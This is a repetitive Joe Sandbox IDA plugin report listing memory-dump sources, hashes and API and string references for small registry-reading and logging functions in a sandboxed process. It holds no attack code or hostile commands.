
Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 665743573851454454ba538c1e50c16943c9fe146876193c875de75a4f8b0fed
Instruction ID: 5a32b865329c65103b22907229781c34a5bdd349b4c7bb1588adab00df91674f
Opcode Fuzzy Hash: 665743573851454454ba538c1e50c16943c9fe146876193c875de75a4f8b0fed
Instruction Fuzzy Hash: 3DF0F62BB0A68EC1E553CF40FC503752254BF42BA4F480136DD0D46392EF2DEA8AC304

Function 00007FFDA55D359D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55D364D

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55D369D
registry_get_value, xrefs: 00007FFDA55D3696

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0762fc2cb1aba46cbd9c07251b0a1a3a97b6b7f0123497747c2785a4a9737169
Instruction ID: dba94056e40ed550188ca561cddcbfff838dce98b6f76d2748928f36fcce5067
Opcode Fuzzy Hash: 0762fc2cb1aba46cbd9c07251b0a1a3a97b6b7f0123497747c2785a4a9737169
Instruction Fuzzy Hash: 16F0F62BB0A78EC5E553CF40F8503752254AF42BA5F480236DD0D46392EF2DEA8AC304

Function 00007FFDA55D363C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55D364D

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55D369D
registry_get_value, xrefs: 00007FFDA55D3696

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: efea60717c5cd3337c7cdb5f2f726892b9ed2473e78e612ae385b2e3917266b9
Instruction ID: c976a74745a3aef4b1a391b473189b1e32a0cda69fb8eb3e7e5a57d827cd1dc3
Opcode Fuzzy Hash: efea60717c5cd3337c7cdb5f2f726892b9ed2473e78e612ae385b2e3917266b9
Instruction Fuzzy Hash: 79F0F62BB0A78EC2E553CF40F8503756254AF42BA4F480136DD0D86792EF2DEA8AC304

Function 00007FFDA55D362E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55D364D

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55D369D
registry_get_value, xrefs: 00007FFDA55D3696

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b7b11434295f38ce3cc38029b6fcd9c2daf9401dfd118b0b22f82ab2cf596224
Instruction ID: a4a0e05aff9126d8b9b9e5df18d0b512170cdae4707d74384d0960f509f0bcb6
Opcode Fuzzy Hash: b7b11434295f38ce3cc38029b6fcd9c2daf9401dfd118b0b22f82ab2cf596224
Instruction Fuzzy Hash: D1F0C22BB0A68E81E553CF40F8503752254AF42BA4F480136DD0D46392EF2DEA8AC304

Function 00007FFDA55D36B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55D364D

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55D369D
registry_get_value, xrefs: 00007FFDA55D3696

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b23563d9c9b30c40a0829dfa9c2e5754b3fbf0a149fdb7cb53c5482f5b5d878b
Instruction ID: 6c03c73e2e3c85f33250f088f1f25316bb6ca2868a288d33f86ef1ae2fe05696
Opcode Fuzzy Hash: b23563d9c9b30c40a0829dfa9c2e5754b3fbf0a149fdb7cb53c5482f5b5d878b
Instruction Fuzzy Hash: A5F0F62BB0A78EC1E653CF40F8503752254BF42BA4F080236DD4D46792EF2DEA8AD304

Function 00007FFDAC0FBC87 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC0FBD2D

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC0FBD7D
registry_get_value, xrefs: 00007FFDAC0FBD76

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5efb9e9ee29dc520bb349b9fe77adf778f379b043b44a299b9e0271328daa642
Instruction ID: d9dd09d1882e60c71e80aa1470535a98f7bb75becb51a61c158f68804db50b1f
Opcode Fuzzy Hash: 5efb9e9ee29dc520bb349b9fe77adf778f379b043b44a299b9e0271328daa642
Instruction Fuzzy Hash: 92F0CD2270A20A82E5529B00BC503BA6254AF407F5F480236ED9D467D2EF2DD9D9AB48

Function 00007FFDAC0FBC7D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC0FBD2D

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC0FBD7D
registry_get_value, xrefs: 00007FFDAC0FBD76

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: c9e1c4e72542d293f4f7c38c434bdaa79406ce81bed1867eaacfef0332bc61ac
Instruction ID: 9dd76431777916f1719a3583f0e34ca9219247326996c9432e613ff88f76e926
Opcode Fuzzy Hash: c9e1c4e72542d293f4f7c38c434bdaa79406ce81bed1867eaacfef0332bc61ac
Instruction Fuzzy Hash: 21F0CD2270A30A82E5529B00B8603BA6254AF407F5F480236ED9D46792EF2DD9D9AB48

Function 00007FFDAC0FBD1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC0FBD2D

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC0FBD7D
registry_get_value, xrefs: 00007FFDAC0FBD76

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7e712a24bfc18a2ef7346bed346fb8b76471770fb1bf9d5f46ee9cae0fc4f40d
Instruction ID: 2747a379bfe7e190fe7c11ad344ca1a4499fc4b8f36d87c86d786e3f92870470
Opcode Fuzzy Hash: 7e712a24bfc18a2ef7346bed346fb8b76471770fb1bf9d5f46ee9cae0fc4f40d
Instruction Fuzzy Hash: DBF0CD2270A20A82E5529B00B8503BA6254AF407F5F480236ED9D46792EF2DD9D9AB48

Function 00007FFDAC0FBD0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC0FBD2D

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC0FBD7D
registry_get_value, xrefs: 00007FFDAC0FBD76

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 54484f0d1ab608449beaedbf91fc840c736ed0b0363b8843ac4bd8e6068824a9
Instruction ID: a9056f50c7018f244d6757ed054d590917c4c4099d51f04f95a3c38a463443c5
Opcode Fuzzy Hash: 54484f0d1ab608449beaedbf91fc840c736ed0b0363b8843ac4bd8e6068824a9
Instruction Fuzzy Hash: B4F0C22270A20681E5529B00BC503796254AF407F5F480236DD9D46792EF2DD9D9A748

Function 00007FFDAC0FBD98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDAC0FBD2D

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC0FBD7D
registry_get_value, xrefs: 00007FFDAC0FBD76

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 63853b8f4cdf748eb39a6ffd810eedd0ad9d35cc9a5385b2a08ee39dbdd322e5
Instruction ID: 4d88872ed677bea76dcdc97c207d5ce92f3e31c4a4924ce7759847601b62a857
Opcode Fuzzy Hash: 63853b8f4cdf748eb39a6ffd810eedd0ad9d35cc9a5385b2a08ee39dbdd322e5
Instruction Fuzzy Hash: B5F0C22270A30681E5529B00B8503796254AF407F4F480236DD9D46792EF2DD9D9A748

Function 00007FF70CAD9578 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF70CAD950D

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

registry_get_value, xrefs: 00007FF70CAD9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF70CAD955D

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: f95c7f613990e8359955edc98602e44f65324a22fc2a34fe8abc44b0cfde0c07
Instruction ID: 6a1b8318df53ff2570f84d8adb9df056e0aeca4c2fda26583e5eb028a5148c45
Opcode Fuzzy Hash: f95c7f613990e8359955edc98602e44f65324a22fc2a34fe8abc44b0cfde0c07
Instruction Fuzzy Hash: CFF02BA260874741E952AF10FC80BF6B654FF40798F880236ED5E47694DF3CD9899310

Function 00007FF70CAD94FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF70CAD950D

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

registry_get_value, xrefs: 00007FF70CAD9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF70CAD955D

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 39aaf49a42b38c45c43456f641b73758d388b580c46ae1c3321e64665559df8d
Instruction ID: 9254aef54101f814b5272a51a605eb96f12612acc4d1dc74f20135b18163622f
Opcode Fuzzy Hash: 39aaf49a42b38c45c43456f641b73758d388b580c46ae1c3321e64665559df8d
Instruction Fuzzy Hash: 0BF02BA260874742E952AF10FC80BF6F654EF40798FC80236ED1E47694DF3CD9899310

Function 00007FF70CAD94EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF70CAD950D

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

registry_get_value, xrefs: 00007FF70CAD9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF70CAD955D

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 9ee8d6b3311edb7c6a60458bba9abb73d307667f613677e60545acc50e7dab72
Instruction ID: 03f7923b9088ee33068ceb0fe19b2217b9dbb512656afe9bbb206b9b9fb9930a
Opcode Fuzzy Hash: 9ee8d6b3311edb7c6a60458bba9abb73d307667f613677e60545acc50e7dab72
Instruction Fuzzy Hash: 55F02BA660874741E952AF10FC80BF6B658EF40798FC80236ED1E47694DF3CD9899310

Function 00007FF70CAD9467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF70CAD950D

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

registry_get_value, xrefs: 00007FF70CAD9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF70CAD955D

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 290ae42efc0832579e058e7bb1e772215776ba7f21648772df87130b8cef0840
Instruction ID: 786f4642835081cb1c49c6c7cb6fcf26c7ba74a96d23910cc24b65fc36636407
Opcode Fuzzy Hash: 290ae42efc0832579e058e7bb1e772215776ba7f21648772df87130b8cef0840
Instruction Fuzzy Hash: 11F0F6A260874641E952AF10FC80BF6B654EF40798F880236ED1E47694DF3CD9899310

Function 00007FF70CAD945D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF70CAD950D

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

registry_get_value, xrefs: 00007FF70CAD9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF70CAD955D

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0738e5f813ccfdbd9946cf18aed2d39c3dbbb2a30a0980b77edb6c20e24c00d2
Instruction ID: 2f1aecae67bf9288b74fe209941c90baf6f692e60be8fafaa469cb66448c9744
Opcode Fuzzy Hash: 0738e5f813ccfdbd9946cf18aed2d39c3dbbb2a30a0980b77edb6c20e24c00d2
Instruction Fuzzy Hash: 8BF02BA270874B41E952AF10FC80BF6B654EF40798FC80236ED1E47694DF3CD9899310

Function 00007FFDA557361D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55736CD

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

